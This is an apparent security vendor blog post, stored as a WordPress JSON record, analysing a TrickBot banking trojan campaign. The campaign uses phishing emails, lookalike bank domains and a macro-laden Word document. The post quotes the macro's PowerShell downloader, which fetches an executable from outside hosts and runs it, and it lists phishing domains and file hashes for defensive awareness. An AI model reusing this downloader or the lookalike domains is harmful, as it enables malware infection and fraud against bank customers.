{"id":2345,"date":"2024-09-25T17:38:54","date_gmt":"2024-09-25T17:38:54","guid":{"rendered":"https:\/\/xdr-mdr.lmntrix.com\/main_web\/?p=2345"},"modified":"2025-07-29T03:35:53","modified_gmt":"2025-07-29T03:35:53","slug":"and-now-for-my-next-trick-highly-crafted-banking-email-hiding-trickbot-trojan","status":"publish","type":"post","link":"https:\/\/lmntrix.com\/blog\/and-now-for-my-next-trick-highly-crafted-banking-email-hiding-trickbot-trojan\/","title":{"rendered":"And now for my next trick\u2026 Highly crafted banking email hiding TrickBot trojan"},"content":{"rendered":"
\n
\"\"<\/figure>\n<\/div>\n\n\n

Although the TrickBot banking Trojan has been active from the fall of 2016, there has recently been a huge surge in its delivery.\u00a0

A particularly impressive feature of this most recent campaign is the author\u2019s \u00a0almost prefect imitation of bank URLs to deliver the payload.\u00a0

The trojan has always been propagated via the fairly common MalSpam method, and this time is no exception. Some of the sample templates used by the threat actors are below:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

\u00a0
The phishing URLs used in the campaign are the result of meticulous work to closely match the bank\u2019s original URL. By crafting similar URLs, the attackers hope to maximise the malware\u2019s delivery. Following is a list which shows the phishing URL\u2019s used in the campaign:

hsbcdocs.co.uk

hmrccommunication.co.uk

lloydsbacs.co.uk

nationwidesecure.co.uk

natwestdocuments6.ml

santanderdocs.co.uk

santandersecuremessage.com

securenatwest.co.uk<\/strong>

Interestingly, all the domains are registered by godaddy.com using email authentication and HTTPS services as seen below:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n


From the registration date of the domains, it can be seen that these were only recently registered, explicitly for malicious purpose.

One of the \u00a0campaign\u2019s primary tools is a malicious DOC embedded with Macro code. \u00a0 \u00a0 \u00a0 \u00a0\u00a0<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Malicious DOC File name: SecureDoc.doc

MD5: d2e29e738f96c51b0a6d874532907114

The Macro code embedded into the doc invokes powershell to download the payload:

“function selt([String] $tr){(New-Object System.Net.WebClient).DownloadFile($tr,’C:\\Users\\bob\\AppData\\Local\\Temp\\Cqgcf.exe’);StartProcess’C:\\Users\\bob\\AppData\\Local\\Temp\\Cqgcf.exe’;}try{selt(‘http:\/\/centromiosalud.es\/armanistand.png’)}catch{selt(‘http:\/\/cfigueras.com\/armanistand.png’)}\u201d<\/strong>

A Network Query is performed by the document to download the payload:\u00a0
<\/p>\n\n\n\n

How to turn today\u2019s teen rebels into tomorrow\u2019s cyber special forces
<\/p>\n\n\n\n

Downloaded Payload Details<\/strong>

Filename: armanistand.png

Md5: 675119986b6df9441fbed1e6a8ae9da5

According to VirusTotal, the file has been flagged as malicious by multiple AV vendors.<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

\u00a0The payload is a Windows PE executable with high entropy on the PE header section:<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

Behavioral analysis of the executable shows us that the malware gains persistence with the below operation, and deploys a bot on the infected machine:

C:\\Documents and Settings\\\\Application Data\\winapp\\cc408142e00c605462104e004417b48b505006a124e5041422115c0333620577<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

\u00a0Conclusion<\/strong>

TrickBot\u2019s updated payload module acts as a bot on the infected host. According to multiple threat intelligence feeds, the TrickBot campaign has been delivered in huge numbers in only a short span of time. As its initial MalSpam delivery is highly crafted to resemble a legitimate email, many users have already fallen victim. Users should remain vigilant, particularly when receiving emails from their bank. Many banks today have a feature on their website where scams can be flagged so the bank can warn its customers not to open the malicious emails.\u00a0

Anyone who receives such an email is encouraged to flag it with the bank being imitated. \u00a0<\/p>\n","protected":false},"excerpt":{"rendered":"

Although the TrickBot banking Trojan has been active from the fall of 2016, there has recently been a huge surge in its delivery.  A particularly impressive feature of this most recent campaign is the author’s  almost prefect imitation of bank URLs to deliver the payload.  The trojan has always been propagated via the fairly common […]<\/p>\n","protected":false},"author":1,"featured_media":2371,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-2345","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2345","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/comments?post=2345"}],"version-history":[{"count":3,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2345\/revisions"}],"predecessor-version":[{"id":4247,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/posts\/2345\/revisions\/4247"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media\/2371"}],"wp:attachment":[{"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/media?parent=2345"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/categories?post=2345"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lmntrix.com\/blog\/wp-json\/wp\/v2\/tags?post=2345"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}